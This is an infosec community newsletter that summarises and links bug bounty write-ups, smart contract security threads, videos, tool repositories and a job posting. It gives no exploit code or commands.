👩‍💻IW Weekly #38: Cache Poisoning, XSS Payloads, Akamai and Amazon S3 buckets, Hybrid Fuzzing in Smart Contracts, SSO, Blockchain Security Audit, and much more…

Learn how to use XSS payloads that result in bounties up to $44,625.

Welcome to the #IWWeekly38 - the Monday newsletter that brings the best in Infosec straight to your inbox.

IWCON2022 finally came to a glorious end yesterday night ❤️ Thank you for joining us. I hope you had a lot of fun and learned something new 😊 Please share your feedback here to help us make the next version better for you :)

Coming back to today's NL, here are our top picks for this week: 7 articles, 6 Threads, 5 videos, 2 Github repos and tools, 1 job alert to help you maximize the benefit from this newsletter and take a massive jump ahead in your career.

Excited? Let’s jump in 👇

📝 7 Infosec Articles (5+ 2 beginner-friendly)

#1 @TarunkantG has shared a unique case of cache poisoning that occurs between Akamai and Amazon S3 buckets.

#2 @pmnh_ and @UsmanMansha used Spring Expression Language injection on a Spring Boot application in order to bypass Akamai WAF and achieve remote code execution (P1). Read on to learn how they achieved it.

#3 Read how @jzeerx got SSTI which resulted in arbitrary file reading on one of Asia's leading payment systems.

#4 Gafnit Amiga uncovers a major security flaw in AWS ECR Public where external actors can delete, update, and create images, layers, and tags.

#5 Read Omar Hashem’s in-detail article where he explained CVE-2022-42710 journey in the linear eMerge E3 Series to trace the path from XXE to Stored-XSS.

Beginner-friendly -

#1 Pratik Gaikwad discovered a privilege escalation vulnerability that resulted in the deletion of accounts and workspaces belonging to other people and organizations.

#2 Abdelrhman Allam created a comprehensive blog post on single sign-on (SSO).

🧵6 Trending Threads (4 + 2 beginner-friendly)

#1 Do you want to learn hybrid fuzzing in smart contracts? Read this amazing thread by Patrick Collins.

#2 Want to improve your smart contract auditing? Read Pashov's thread on how he plans to become an advanced smart contract auditor.

#3 Csanuragjain curated a list of notable blockchain security audit organisations along with the published audits.

#4 MixBytes shared his techniques on how to analyze a smart contract audit report.

Beginner-friendly -

#1 Het Mehta provided a list of free security operation centre (SOC) certifications.

#2 Abishek Meena shared his amazing techniques for dealing against Waf's.

📽️ 5 Insightful Videos (3 + 2 beginner-friendly)

#1 @ProgrammerSmart walks you through Ethernaut level 03 - Coin Flip challenge which involves beating the randomness of the contract to guess values.

#2 Watch this story of an RCE on Apple through hot jar swapping by @fransrosen.

#3 Learn how to fuzz Ethereum smart contracts using echidna by @trailofbits.

Beginner-friendly -

#1 Wondering what are the most used XSS payloads that fetch hackers bounties? Check out this video by @gregxsunday where he discusses why, how and where XSS payloads get used resulting in bounties up to $44,625.

#2 Watch this amazing talk on Command-Line Data-Wrangling by @TomNomNom on NahamCon2022EU.

⚒️ 2 GitHub repositories & Tools

#1 Coinspect Security has created a collection of Foundry tests that includes attacks, bug bounty claims, and potential vulnerabilities on EVM chains.

#2 Immunefi's collaborative repository aims to provide all of the material you need to begin or expand your understanding of online security.

💰1 Job Alert

#1 PhonePe is looking for a Security engineer. Checkout the details here.

💸Advertise with us💸

We are looking to partner with amazing infosec, pen testing, and ethical hacking teams, brands, and companies from all over the world.

If you'd like to advertise to our 27k+ community of cybersecurity enthusiasts, click here to partner with us.

—----------------------------------------------------------------------------------

That’s all for this week. Hope you enjoyed these incredible finds and learned something new from today’s newsletter.

Before we say bye…

If you found this newsletter interesting, and know other people who would too, we'd really appreciate if you could forward it to them 📨

If you have questions, comments, or feedback, just reply to this email or let us know on Twitter @InfoSecComm.

See you again next week.

Lots of love
Editorial team,
Infosec Writeups

This newsletter has been created in collaboration with our amazing ambassadors.

Resource contribution by: Nikhil A Memane, Bhavesh Harmalkar, Mohit Khemchandani, Vinay Kumar, Manikesh Singh, and Tuhin Bose.

Newsletter formatting by: Hardik Singh, Vinay Kumar, Siddharth and Ayush Singh.